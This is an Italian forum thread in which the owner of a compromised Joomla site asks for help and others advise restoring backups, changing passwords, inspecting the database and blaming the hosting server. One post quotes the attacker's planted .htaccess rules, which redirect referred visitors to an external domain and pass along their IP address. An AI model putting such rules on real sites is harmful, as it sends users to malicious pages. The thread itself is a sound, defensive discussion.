• User Attivo

    Sito attaccato aiuto

    Ciao a tutti,
    ho davvero urgente bisogno di aiuto.
    Ho notato che il mio sito è stato attaccato ogni pagina ha un redirect e con internet explorer segnala un attacco trojan, insomma per chi entra non è un bel vedere rischio di perdere utenti, non riesco ad entrare nel pannello di gestione di joomla del mio sito(amministrazione), quindi non posso metterlo offline.😢
    Poi non riesco ad entrare nel database mysql all'indirizzo anche qui c'è stato un attacco, ma riesco a visuallizzare i file del sito in ftp, con filezilla.
    Cosa mi consigliate di fare?
    Aiutooo!! Aspetto una risposta il più presto possibile.
    Grazie


  • User Attivo

    Una domanda banale ma ovvia..hai un backup del sito?


  • User Attivo

    Vedo che rispetto a stamattina qualcosa è cambiato...ci stai lavorando?
    Come procede?

    Se serve qualche consiglio, chiedi...provo ad aiutarti...

    :ciauz:


  • User Attivo

    Si ho un backup ma risale a 20 giorni fa, quindi volevo se possibile recuperare, ma stamattina ho deciso, che si rispristina tutto.
    Grazie a tutti


  • User Attivo

    Per ripristinare bisognava analizzare bene cosa era stato attaccato...non era una cosa semplice, forse la strada che hai scelto è quella che ti permette di tornare online il prima possibile.

    Buon lavoro...

    :ciauz:


  • User Attivo

    Volevo sapere ma basta solo cancellare e riprisitnare i file in ftp, senza toccare in database sql? Si può essere sicuri cosi?
    Perche cosi facendo mi ritrovo il sito senza nessun problema e con gli articoli anche i più recenti pubblicati, e non devo fare lavoro in più. Posso stare tranquillo? o no?


  • User Attivo

    Se funziona si...
    Joomla è aggiornato all'ultima versione disponibile?
    Sei riuscito ad accedere al mysql?

    Io, nel dubbio, cambierei anche tutte le password...mysql, ftp, joomla...

    :ciauz:


  • User Attivo

    @Kre0 said:

    Se funziona si...
    Joomla è aggiornato all'ultima versione disponibile?
    Sei riuscito ad accedere al mysql?

    Io, nel dubbio, cambierei anche tutte le password...mysql, ftp, joomla...

    :ciauz:
    Si aggiornato.
    Si accedo al mysql. E ho già cambiato le password di joomla.

    Però ancora ho paura che ci sia qualcosa dentro il database, spero di no, ma come faccio ad essere sicuro?


  • User Attivo

    Non credo ci sia modo di esserlo al 100% ... non ho neanche ben capito che tipo di redirect avevano fatto ... l'unica credo sia darci una guardata generica... :bho:


  • User Attivo

    io ora ho solo paura che ci sia qualcosa dentro il database, perchè è l'unico posto dove non so come controllare, scaricando il db sul pc e facendo uno scan con l'antivirus, mi dice è ok.
    Ma per caso esiste un qualcosa per controllare il db?


  • User Attivo

    scan con antivirus sul file del db non troverà mai nulla. il trojan rilevato sul web non è un file dentro il db; se vi è qualcosa è quasi sicuramente una stringa html, degli include o dei comandi php o altro per cui unico modo sarebbe passare a mano tutto il file e "leggerlo" per vedere se vi sono cose strane ... tipo cercando l'url a cui venivi reinderizzato (sempre che l'url non fosse codificato in qualche modo).
    ma nel backup non avevi anche un backup del db? così ripristini pure quello.

    certo che la via del backup è la più veloce ma io prima avrei salvato anche il sito corrotto in modo da analizzare le differenze e soprattutto cercare di capire da dove lo hanno corrotto, altrimenti rischi che succeda nuovamente se non tappi la falla...


  • User Attivo

    Oggi a distanza di pochi giorni mi hanno di nuovo modificato il sito.
    Allora come l'altra volta mi hanno inserito in ogni cartella del file joomla un file .htaccess, ecco cosa c'è dentro questo file.

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^h t tp : //
    RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
    RewriteRule . h t t p:// 84f6a4eef61784b33e4acbd32c8fdd72 . com/%{REMOTE_ADDR}

    Io seguo tutte le procedure, ho cancellato tutto il sito e ripristinato con un backup sicuro. Cambio le password.
    Qualcuno può avere un idea, c'è qualcosa che sbaglio? Perchè non so più cosa fare, non posso ogni 3 giorni uplodare il sito...
    Aiutooo!!


  • User Attivo

    installa qualcosa come OSE antihacker o i più semplici firewall per joomla (li trovi in extensions.joomla.org) ma se ti scrivono un file .htaccess in ogni cartella potrebbe anche non essere un problema di Joomla (molto probabilmente). Su che hosting sei?

    Io un tempo ero su un hosting dove ogni giorno mi trovavo pagine html inserite nelle cartelle (per fare phishing) e il provider ovviamente dava la colpa a Joomla (aggiornato alla ultimissima release, nessun componente aggiuntivo, tutti i sistemi di sicurezza possibile e immaginabili installati), bhè per farla breve ho cancellato Joomla e lasciato il sito con una sola pagina index.html per un paio di giorni e ... strano ma vero continuavano a copiarmi i file nelle cartelle = il problema era il server che aveva delle falle di sicurezza quindi incavolata generale e urla a non finire con il provider e miracolosamente il mio sito non è più stato modificato 😉


  • User Attivo

    Si anche io penso che il mio problema non di Joomla perchè è aggiornato, poi come dici tu, se mi inseriscono dei file dentro il mio spazio, in ogni cartella anche quelle che non fanno parte di joomla, tipo cartelle di immagini etc...
    Penso contatterò il mio provider